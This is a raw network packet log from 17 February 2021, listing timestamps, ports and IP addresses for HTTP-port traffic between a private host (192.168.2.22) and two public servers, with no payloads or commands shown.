Feb 17, 2021 22:56:45.737011909 CET	80	49168	166.62.10.32	192.168.2.22
Feb 17, 2021 22:56:45.737037897 CET	80	49168	166.62.10.32	192.168.2.22
Feb 17, 2021 22:56:45.737143993 CET	49168	80	192.168.2.22	166.62.10.32
Feb 17, 2021 22:56:45.807948112 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:45.966809988 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:45.966911077 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:45.967051029 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.125727892 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499458075 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499519110 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499558926 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499598026 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499635935 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499684095 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499684095 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.499725103 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.499727964 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499738932 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.499768972 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499809027 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499844074 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.499847889 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.499914885 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.658565044 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658621073 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658658981 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658698082 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658737898 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658776045 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658778906 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.658813000 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.658817053 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658842087 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.658858061 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658906937 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658931971 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.658951044 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.658989906 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659028053 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.659029007 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659068108 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659091949 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.659105062 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659145117 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659166098 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.659183979 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659250975 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.659327984 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.659610987 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659655094 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659692049 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659727097 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.659739017 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.659821987 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.661585093 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.817890882 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.817951918 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.817991972 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818032026 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818069935 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818120956 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818150997 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818299055 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818312883 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818353891 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818401098 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818406105 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818444014 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818474054 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818541050 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818581104 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818619967 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818624020 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818659067 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818689108 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818707943 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818775892 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818778992 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818820000 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818857908 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818896055 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818900108 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818933964 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.818969965 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.818972111 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819020033 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819051027 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819062948 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819123983 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819164038 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819186926 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819211960 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819256067 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819286108 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819294930 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819336891 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819364071 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819375992 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819413900 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819453955 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819453955 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819492102 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819528103 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819540024 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819581985 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819607019 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819619894 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819658041 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819690943 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819696903 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819734097 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819766998 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.819772959 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.819838047 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.820766926 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977330923 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977375984 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977443933 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977483034 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977520943 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977557898 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977582932 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977606058 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977621078 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977648973 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977686882 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977686882 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977725029 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977762938 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977770090 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977799892 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977838993 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977845907 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977876902 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977924109 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.977925062 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.977968931 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978005886 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978010893 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.978044987 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978180885 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.978244066 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978285074 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978369951 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.978403091 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978445053 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978482962 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978523016 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978529930 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.978559971 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978559017 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.978607893 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978650093 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978656054 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.978688002 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.978733063 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979305029 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979335070 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979347944 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979388952 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979427099 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979427099 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979466915 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979506016 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979546070 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979552984 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979571104 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979594946 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979633093 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979671001 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979671955 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979712009 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979748964 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979758978 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979787111 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979825020 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979826927 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979871035 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979899883 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.979913950 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979954958 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.979994059 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.980000973 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.980031967 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.980068922 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:46.980068922 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.980144024 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.981017113 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:46.982048035 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.136847973 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.136918068 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.136961937 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137001038 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137037992 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137038946 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137080908 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137087107 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137130976 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137168884 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137170076 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137207985 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137248039 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137252092 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137285948 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137326956 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137336016 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137365103 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137412071 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137444973 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137495041 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137527943 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137537956 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.137620926 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.137990952 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.138567924 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138613939 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138705969 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.138720989 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138762951 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138777971 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.138803005 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138842106 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138851881 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.138876915 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.138920069 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.139818907 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.139858007 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.139897108 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.139914989 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.139935970 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.139982939 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.140347958 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.140367031 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.140417099 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.140460968 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.140487909 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.140542984 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141052961 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141096115 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141134977 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141150951 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141172886 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141211987 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141212940 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141252995 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141299009 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141299963 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141345024 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141391039 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141405106 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141458035 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141469002 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141499043 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141537905 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141544104 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141585112 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141603947 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141618013 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141657114 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141690969 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141695976 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141733885 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141771078 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141777039 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141808987 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141846895 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.141850948 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.141923904 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.142571926 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.143629074 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.296375036 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296437979 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296471119 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296502113 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296541929 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296581030 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296618938 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296658039 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296700954 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296749115 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296792030 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296792984 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.296830893 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296838999 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.296848059 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.296870947 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296904087 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.296910048 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.296973944 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.297374964 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297444105 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297482967 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297522068 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297532082 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.297555923 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297593117 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297609091 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.297631979 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.297663927 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.298544884 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.299108028 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.299151897 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.299189091 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.299228907 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.299230099 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.299266100 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.299297094 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.299314976 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.299433947 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.299576998 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300369024 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300410032 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300446987 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300486088 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300493002 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300525904 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300558090 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300564051 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300596952 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300605059 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300621986 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300645113 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300692081 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300714970 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300734997 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300772905 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300811052 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.300812960 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.300879002 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.301068068 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.301107883 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.301173925 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.301650047 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.302150011 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302192926 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302222967 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302261114 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302263021 CET	49169	80	192.168.2.22	192.185.52.115
Feb 17, 2021 22:56:47.302319050 CET	80	49169	192.185.52.115	192.168.2.22
Feb 17, 2021 22:56:47.302331924 CET	49169	80	192.168.2.22	192.185.52.115
